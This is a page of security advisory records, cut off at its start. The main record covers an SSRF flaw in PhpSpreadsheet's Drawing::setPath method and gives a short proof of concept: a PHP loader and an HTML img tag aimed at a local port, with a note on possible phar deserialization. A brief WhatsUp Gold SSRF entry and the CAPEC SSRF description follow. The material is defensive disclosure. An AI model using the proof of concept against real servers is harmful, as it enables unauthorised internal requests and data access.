{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-RX7M-68VC-PPXH
Vulnerability from github – Published: 2025-08-25 14:32 – Updated: 2025-08-29 21:09Product: PhpSpreadsheet
Version: 3.8.0
CWE-ID: CWE-918: Server-Side Request Forgery (SSRF)
CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
Description: SSRF occurs when a processed HTML document is read and displayed in the browser
Impact: Server-Side Request Forgery
Vulnerable component: the PhpOffice\PhpSpreadsheet\Worksheet\Drawing class, setPath method
Exploitation conditions: getting a string from the user that is passed to the HTML reader
Mitigation: improved processing of the $path variable of the setPath method of the PhpOffice\PhpSpreadsheet\Worksheet\Drawing class is needed
Researcher: Aleksey Solovev (Positive Technologies)
Research
The researcher discovered zero-day vulnerability Server-Side Request Forgery (SSRF) (in the setPath method of the PhpOffice\PhpSpreadsheet\Worksheet\Drawing class) in Phpspreadsheet.
The latest version (3.8.0) of the phpoffice/phpspreadsheet library was installed. Below are the details of the installation:
Listing 1. Installing the phpoffice/phpspreadsheet library
$ composer require phpoffice/phpspreadsheet --prefer-source
The code that processes the HTML string with further rendering and displaying the result in the browser. Listing 2. Executable file index.php using the PhpSpreadsheet library
<?php
require __DIR__ . '/vendor/autoload.php';
$inputFileType = 'Html';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
$inputFileName = './doc/file.html';
$spreadsheet = $reader->load($inputFileName);
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer->generateHTMLAll());
Also, the ./doc/file.html has the following content: the img tag with the src attribute, which contains the value http:// 127.0.0.1:1337
Listing 3. The ./doc/file.html file
<table>
<tr>
<img src="http://127.0.0.1:1337">
</tr>
</table>
The vulnerability lies in the setPath method of the PhpOffice\PhpSpreadsheet\Worksheet\Drawing class.
Figure 1. The PhpOffice\PhpSpreadsheet\Worksheet\Drawing class, setPath method.
Figure 2 below demonstrates the SSRF vulnerability exploitation.
Figure 2. Demonstration of the SSRF vulnerability exploitation
Also, there is code on line 154 that could potentially be used by an attacker to perform unsafe deserialization via the phar archive and the file_exists method.
Figure 3. Opportunity to perform phar deserialization
Please, assign all credits to: Aleksey Solovev (Positive Technologies)
Credit
Aleksey Solovev (Positive Technologies)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.30.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.4.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.10.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "5.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54370"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-25T14:32:32Z",
"nvd_published_at": "2025-08-25T14:15:33Z",
"severity": "HIGH"
},
"details": "**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-918: Server-Side Request Forgery (SSRF)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**Description:** SSRF occurs when a processed HTML document is read and displayed in the browser\n**Impact:** Server-Side Request Forgery\n**Vulnerable component:** the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class, `setPath` method\n**Exploitation conditions:** getting a string from the user that is passed to the HTML reader\n**Mitigation:** improved processing of the `$path` variable of the `setPath` method of the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class is needed\n**Researcher: Aleksey Solovev (Positive Technologies)**\n\n# Research\nThe researcher discovered zero-day vulnerability Server-Side Request Forgery (SSRF) (in the `setPath` method of the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class) in Phpspreadsheet.\nThe latest version (3.8.0) of the `phpoffice/phpspreadsheet` library was installed. Below are the details of the installation:\n\n*Listing 1. Installing the phpoffice/phpspreadsheet library*\n```\n$ composer require phpoffice/phpspreadsheet --prefer-source\n```\nThe code that processes the HTML string with further rendering and displaying the result in the browser.\n*Listing 2. Executable file index.php using the PhpSpreadsheet library*\n```\n\u003c?php\n\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n$inputFileType = \u0027Html\u0027;\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType); \n\n\n$inputFileName = \u0027./doc/file.html\u0027;\n$spreadsheet = $reader-\u003eload($inputFileName); \n\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet); \nprint($writer-\u003egenerateHTMLAll());\n```\n\nAlso, the `./doc/file.html` has the following content: the `img` tag with the `src` attribute, which contains the value `http:// 127.0.0.1:1337`\n\n*Listing 3. The ./doc/file.html file*\n```\n\u003ctable\u003e\n \u003ctr\u003e\n \u003cimg src=\"http://127.0.0.1:1337\"\u003e\n \u003c/tr\u003e\n\u003c/table\u003e\n```\nThe vulnerability lies in the `setPath` method of the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class.\n \nFigure 1. The `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class, `setPath` method.\n\n\n\nFigure 2 below demonstrates the SSRF vulnerability exploitation.\n\n\n\nFigure 2. Demonstration of the SSRF vulnerability exploitation\n\nAlso, there is code on line 154 that could potentially be used by an attacker to perform unsafe deserialization via the `phar` archive and the `file_exists` method.\n \nFigure 3. Opportunity to perform phar deserialization\n\n\n_____________________________________________\n\nPlease, assign all credits to: Aleksey Solovev (Positive Technologies)\n\n# Credit\n\nAleksey Solovev (Positive Technologies)",
"id": "GHSA-rx7m-68vc-ppxh",
"modified": "2025-08-29T21:09:00Z",
"published": "2025-08-25T14:32:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-rx7m-68vc-ppxh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54370"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/334a67797ace574d1d37c0992ffe283b7415471a"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/4050f14521d70634c3320b170236574a6106eb39"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/81a0de2261f698404587a6421a5c6eb263c40b31"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/ac4befd2f7ccc21a59daef606a02a3d1828ade09"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/c2cd0e64392438e4c6af082796eb65c1d629a266"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2025-54370.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PhpSpreadsheet vulnerable to SSRF when reading and displaying a processed HTML document in the browser"
}
GHSA-RX95-QC5W-CR72
Vulnerability from github – Published: 2022-05-12 00:00 – Updated: 2022-05-21 00:00In Progress Ipswitch WhatsUp Gold 21.0.0 through 21.1.1, and 22.0.0, it is possible for an unauthenticated attacker to invoke an API transaction that would allow them to relay encrypted WhatsUp Gold user credentials to an arbitrary host.
{
"affected": [],
"aliases": [
"CVE-2022-29847"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-11T18:15:00Z",
"severity": "HIGH"
},
"details": "In Progress Ipswitch WhatsUp Gold 21.0.0 through 21.1.1, and 22.0.0, it is possible for an unauthenticated attacker to invoke an API transaction that would allow them to relay encrypted WhatsUp Gold user credentials to an arbitrary host.",
"id": "GHSA-rx95-qc5w-cr72",
"modified": "2022-05-21T00:00:56Z",
"published": "2022-05-12T00:00:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29847"
},
{
"type": "WEB",
"url": "https://community.progress.com/s/article/WhatsUp-Gold-Critical-Product-Alert-May-2022"
},
{
"type": "WEB",
"url": "https://www.progress.com/network-monitoring"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.